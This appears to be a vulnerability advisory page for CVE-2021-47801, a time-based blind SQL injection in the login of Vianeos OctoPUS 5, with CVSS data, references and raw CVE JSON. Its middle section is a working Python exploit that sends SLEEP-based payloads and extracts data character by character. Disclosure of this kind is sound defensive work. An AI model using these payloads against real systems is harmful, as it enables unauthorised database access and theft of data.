Security Vulnerability Report
CVE-2021-47801 CVSS 8.2 HIGH


Published: 2026-01-16 00:16:25
Last Modified: 2026-04-15 00:35:42

Description

Vianeos OctoPUS 5 contains a time-based blind SQL injection vulnerability in the 'login_user' parameter during authentication requests. Attackers can exploit this vulnerability by crafting malicious POST requests with specially constructed SQL payloads that trigger database sleep functions to extract information.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vianeos OctoPUS 5 < 5.x.x (refer to the vendor's official patch announcement for the specific version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import time

# CVE-2021-47801 Time-based Blind SQL Injection PoC
# Target: Vianeos OctoPUS 5 login_user parameter

target_url = "http://target.com/octopus/login"

def test_sqli(payload):
    """Test SQL injection with given payload"""
    data = {
        'login_user': payload,
        'login_password': 'test',
        'submit': 'Login'
    }
    start_time = time.time()
    response = requests.post(target_url, data=data, timeout=30)
    elapsed = time.time() - start_time
    return elapsed, response

# Basic time-based blind SQL injection test
payload = "admin' OR SLEEP(5)-- -"
print(f"Testing payload: {payload}")
elapsed, resp = test_sqli(payload)
print(f"Response time: {elapsed:.2f} seconds")
print(f"Response status: {resp.status_code}")

# Extract single character using time-based technique
def extract_char(database, query, char_pos):
    """Extract character using time-based blind SQL injection"""
    payload = f"admin' AND IF(SUBSTRING(({query}),{char_pos},1)=CHAR({ord(database)}),SLEEP(5),0)-- -"
    elapsed, _ = test_sqli(payload)
    return elapsed > 4

# Example: Extract database version
# query = "SELECT @@version"
# for i in range(1, 50):
#     for ascii_val in range(32, 127):
#         if extract_char(chr(ascii_val), query, i):
#             print(chr(ascii_val), end='', flush=True)
#             break
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47801", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:24.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vianeos OctoPUS 5 contains a time-based blind SQL injection vulnerability in the 'login_user' parameter during authentication requests. Attackers can exploit this vulnerability by crafting malicious POST requests with specially constructed SQL payloads that trigger database sleep functions to extract information."}, {"lang": "es", "value": "Vianeos OctoPUS 5 contiene una vulnerabilidad de inyección SQL ciega basada en tiempo en el parámetro 'login_user' durante las solicitudes de autenticación. Los atacantes pueden explotar esta vulnerabilidad mediante la creación de solicitudes POST maliciosas con cargas útiles SQL especialmente construidas que activan funciones de suspensión de la base de datos para extraer información."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "http://www.vianeos.com/en/home-vianeos/", "source": "[email protected]"}, {"url": "https://vianeos.com/en/products/octopus", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50078", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vianeos-octopus-loginuser-sqli", "source": "[email protected]"}]}}